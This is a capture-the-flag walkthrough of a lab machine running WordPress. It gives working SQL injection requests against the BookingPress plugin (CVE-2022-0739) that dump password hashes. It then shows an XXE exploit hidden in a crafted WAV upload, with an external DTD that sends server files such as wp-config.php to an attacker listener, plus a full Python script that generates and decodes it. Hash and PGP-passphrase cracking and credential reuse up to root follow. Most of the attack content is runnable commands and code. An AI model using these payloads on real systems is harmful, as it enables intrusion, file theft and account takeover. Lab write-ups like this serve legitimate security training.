TCP Scan

> TARGET=10.129.65.154 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp?    syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
  • Add metapress.htb to /etc/hosts (the http-title line shows the redirect to that vhost).
  • 21/tcp FTP requires credentials; nothing to do here for now.
  • Start with 80/tcp: the site is WordPress.

Web Enum

wpscan --url http://metapress.htb -e p,u --plugins-detection aggressive
  • There is a booking app at http://metapress.htb/events/
# Make a booking; the thank-you page returns an appointment id (MQ== is base64 for "1")
http://metapress.htb/thank-you/?appointment_id=MQ==

# The page source references the BookingPress plugin, version 1.0.10, e.g.:
<link rel='stylesheet' id='bookingpress_tel_input-css'  href='http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/bookingpress_tel_input.css?ver=1.0.10' media='all' />

SQLi

  • As described in the BookingPress advisory (CVE-2022-0739: unauthenticated SQL injection in BookingPress < 1.0.11; the site runs 1.0.10), the admin-ajax action needs a valid nonce. Make a booking through the BookingPress form and, in the browser's network traffic, the AJAX requests carry a _wpnonce parameter; copy that value. WordPress nonces are time-limited, so a stale one produces an empty or error response instead of the injected rows.
  • Then test with the advisory's example payload. The injection point is total_service: "-7502)" closes the parenthesis the vulnerable query leaves open, a nine-column UNION follows, and "-- -" comments out the rest of the query.
> curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=ad24ffd7e3&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
  • The first three injected columns (@@version, @@version_comment, @@version_compile_os) are reflected in bookingpress_service_id, bookingpress_category_id and bookingpress_service_name, so those are the columns to use for data extraction (column 4 is reformatted as a price).
  • Replacing the SELECT list with group_concat() over wp_users dumps the WordPress logins and password hashes:
> curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=ad24ffd7e3&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'

[{"bookingpress_service_id":"admin,manager","bookingpress_category_id":"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.,$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}] 

Hash cracking

  • Crack the hashes. Note that the raw JSON response escapes the slash in the second hash as \/; drop the backslash (the hash is $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70) before cracking. -m 400 is hashcat's phpass mode, which WordPress $P$ hashes use. Only manager's password cracks: partylikearockstar
> hashcat.exe -m 400 -a 0 hash.txt rockyou.txt

Foothold

# Start the attacker web server serving attacker/www (make up-mal is this repo's Makefile target; the DTD below expects it on port 8001)
> make up-mal

# Replace <ip> in attacker/www/evil.dtd with your IP; the target fetches this DTD, so the listener must be reachable from it
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://<ip>:8001/?p=%file;'>" >

# Generate a malicious payload
> echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<ip>:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

# Upload the .wav through the media library at http://metapress.htb/wp-admin/upload.php (logged in as manager). WordPress' ID3 parser (getID3) reads the iXML chunk as XML, resolves the external DTD, and the target sends the file contents to our listener:
[Sun Oct 30 17:06:01 2022] 10.129.65.154:54694 [404]: GET /?p=<base64_zipped> - No such file or directory

# Then base64-decode and inflate the result (the php://filter chain produced base64 over raw deflate; PHP's zlib_decode() autodetects that)
<?php
echo zlib_decode(base64_decode('<returned_value>'));
?>
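The steps above (DTD, .wav, decoding the logged request) can be done with one script. This is an added example, not part of the original notes or of the author's repo: it writes evil.dtd for any target file, builds the RIFF/WAVE container with the iXML chunk from the echo one-liner, and decodes the p= blob from the listener's log line. The attacker host:port is an argument (placeholder 10.10.14.5:8001), the chunk sizes are computed from the payload rather than hard-coded, and the sample log line at the bottom is constructed from a fake /etc/passwd so the decoder runs offline.

```python
#!/usr/bin/env python3
"""wav_xxe.py: added example, not from the original notes.

Assumptions not on the page: attacker host:port comes from argv[1]
(placeholder below), target file from argv[2].
"""
import base64
import re
import struct
import sys
import zlib

ATTACKER = "10.10.14.5:8001"  # placeholder; use your own IP and listener port


def build_evil_dtd(attacker: str, target_file: str = "/etc/passwd") -> str:
    """The two parameter entities served from http://<attacker>/evil.dtd.

    %file reads the target through php://filter (deflate, then base64) so the
    contents survive inside a URL; %init defines %trick, which exfiltrates it
    as the p= query parameter of a GET to the listener.
    """
    return (
        '<!ENTITY % file SYSTEM "php://filter/zlib.deflate/'
        f'read=convert.base64-encode/resource={target_file}">\n'
        '<!ENTITY % init "<!ENTITY &#37; trick SYSTEM '
        f"'http://{attacker}/?p=%file;'>\" >\n"
    )


def build_wav(attacker: str) -> bytes:
    """RIFF/WAVE container whose iXML chunk holds the XXE document.

    The media library's ID3 parser treats the iXML chunk as XML and resolves
    the external DTD, which is what triggers the read.
    """
    xml = (
        '<?xml version="1.0"?>'
        "<!DOCTYPE ANY[<!ENTITY % remote SYSTEM "
        f"'http://{attacker}/evil.dtd'>%remote;%init;%trick;] >"
    ).encode() + b"\x00"             # trailing NUL as in the one-liner
    if len(xml) % 2:                 # RIFF chunks are padded to even length
        xml += b"\x00"
    ixml_chunk = b"iXML" + struct.pack("<I", len(xml)) + xml
    riff_body = b"WAVE" + ixml_chunk
    return b"RIFF" + struct.pack("<I", len(riff_body)) + riff_body


def leak_from_log_line(line: str) -> str:
    """Pull the p= value out of a PHP built-in web server log line."""
    m = re.search(r"GET /\?p=([A-Za-z0-9+/=]+)", line)
    if not m:
        raise ValueError("no p= parameter in log line")
    return m.group(1)


def decode_leak(blob: str) -> bytes:
    """Reverse convert.base64-encode, then zlib.deflate.

    php://filter/zlib.deflate emits raw DEFLATE without a zlib header, hence
    wbits=-15; PHP's zlib_decode() in the notes autodetects the same thing.
    """
    return zlib.decompress(base64.b64decode(blob), -15)


def simulate_php_filter(data: bytes) -> str:
    """What the target's php://filter chain produces for data (for testing)."""
    c = zlib.compressobj(wbits=-15)
    return base64.b64encode(c.compress(data) + c.flush()).decode()


# Constructed sample: a fake /etc/passwd run through the same filter chain and
# framed like the 404 line in the notes.
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\njnelson:x:1000:1000::/home/jnelson:/bin/bash\n"
SAMPLE_LOG_LINE = ("[Sun Oct 30 17:06:01 2022] 10.129.65.154:54694 [404]: GET /?p="
                   + simulate_php_filter(SAMPLE_PASSWD) + " - No such file or directory")


if __name__ == "__main__":
    attacker = sys.argv[1] if len(sys.argv) > 1 else ATTACKER
    target = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    with open("evil.dtd", "w") as f:
        f.write(build_evil_dtd(attacker, target))
    with open("malicious.wav", "wb") as f:
        f.write(build_wav(attacker))
    # Paste the logged request line(s) on stdin to decode what came back.
    for line in sys.stdin:
        if "?p=" in line:
            sys.stdout.write(decode_leak(leak_from_log_line(line)).decode(errors="replace"))
```

Usage: `python3 wav_xxe.py 10.10.14.5:8001 /var/www/metapress.htb/blog/wp-config.php` writes evil.dtd and malicious.wav next to the script; after the upload, paste the listener's GET line on stdin to get the file back. The deflate step matters for more than size: a raw file with newlines or "&" would break the URL the entity builds, while base64 over deflate is URL-safe enough for the PHP built-in server to log intact.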
  • /etc/passwd shows a regular user with a home directory, /home/jnelson.
  • We now have arbitrary file read as the web server user. To read a different file, change the resource= path in attacker/www/evil.dtd and upload the .wav again; the aim is to find a credential somewhere on disk.
# Read /etc/nginx/sites-enabled/default to locate the web root
root /var/www/metapress.htb/blog;

# Read the WordPress config, /var/www/metapress.htb/blog/wp-config.php
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
  • We now have FTP credentials; log in (add ftp.metapress.htb to /etc/hosts, same IP as the box).
> ftp ftp.metapress.htb

# Among the files on the FTP share is send_email.php; its SMTP settings contain another credential
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;                          
$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";                           
$mail->SMTPSecure = "tls";                           
$mail->Port = 587;
  • The mail password is reused for the system account: log in as jnelson over SSH and read the user flag.

PE

[i] Check weird & unexpected processes run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
6061      sed-Es,/dev/mqueue|/dev/shm|/home/jnelson|/home/jnelson/.local|/home/jnelson/.local/share|/home/jnelson/.local/share/nano|/home/jnelson/.passpie|/home/jnelson/.passpie/ssh|/run/lock|/run/user/1000|/run/user/1000/systemd|/run/user/1000/systemd/inaccessible|/run/user/1000/systemd/inaccessible/dir|/tmp|/tmp/.font-unix|/tmp/.ICE-unix|/tmp/.Test-unix|/tmp/.X11-unix|/tmp/.XIM-unix|/var/lib/php/sessions|/var/tmp
  • That process is linpeas' own sed, but its argument list (writable directories) reveals /home/jnelson/.passpie and .passpie/ssh, i.e. a passpie password store. linpeas also flags its keyring, which holds both a public and a private PGP key block; copy only the private key block into private.key.
[+] Searching ssl/ssh files
Possible private SSH keys were found!
/home/jnelson/.passpie/.keys
  • Crack the private key's passphrase
# Convert to john crackable format
> gpg2john private.key > hash
# Crack using john
> john --wordlist=/usr/share/wordlists/rockyou.txt hash
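Copying "only the private key part" by hand is error-prone with a long armored file. The following is an added example, not part of the original notes: it extracts the armored private-key block from a passpie .keys keyring, checks the armor layout is intact before handing it to gpg2john, and writes private.key. The keyring embedded below is a constructed stand-in with placeholder base64, not the real .keys from the box.

```python
#!/usr/bin/env python3
"""passpie_key.py: added example, not from the original notes.

Usage: python3 passpie_key.py /home/jnelson/.passpie/.keys  (writes private.key)
"""
import re
import sys

BEGIN = "-----BEGIN PGP PRIVATE KEY BLOCK-----"
END = "-----END PGP PRIVATE KEY BLOCK-----"
B64_LINE = re.compile(r"[A-Za-z0-9+/=]+")


def extract_private_key(keyring_text: str) -> str:
    """Return the armored private-key block, BEGIN/END lines included.

    Armor layout (RFC 4880): BEGIN line, optional "Key: value" headers, a
    blank line, base64 body with an optional "=XXXX" CRC line, END line.
    A truncated copy-paste fails these checks instead of confusing gpg2john.
    """
    blocks = re.findall(re.escape(BEGIN) + r"\n.*?\n" + re.escape(END),
                        keyring_text, re.S)
    if len(blocks) != 1:
        raise ValueError(f"expected one private key block, found {len(blocks)}")
    lines = blocks[0].splitlines()
    if "" not in lines:
        raise ValueError("armor header/body separator (blank line) missing")
    body = lines[lines.index("") + 1:-1]
    if not body or not all(B64_LINE.fullmatch(line) for line in body):
        raise ValueError("armor body is not base64; file may be truncated")
    return "\n".join(lines) + "\n"


# Constructed keyring: public block first, private block second, placeholder
# base64 bodies. Real passpie keyrings look like this but are much longer.
SAMPLE_KEYRING = """-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBGNiAAABCADplaceholderpublicbody
=AbCd
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----

lQPGBGNiAAABCADplaceholderprivatebody
=EfGh
-----END PGP PRIVATE KEY BLOCK-----
"""


if __name__ == "__main__":
    with open(sys.argv[1]) as f:
        key = extract_private_key(f.read())
    with open("private.key", "w") as f:
        f.write(key)
    print("wrote private.key; next: gpg2john private.key > hash")
```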
  • The cracked passphrase unlocks the passpie store; its "ssh" entry holds root's password, so su to root and read the flag
> passpie copy ssh --to stdout
Passphrase: 
p7qfAZt4_A1xo_0x
> su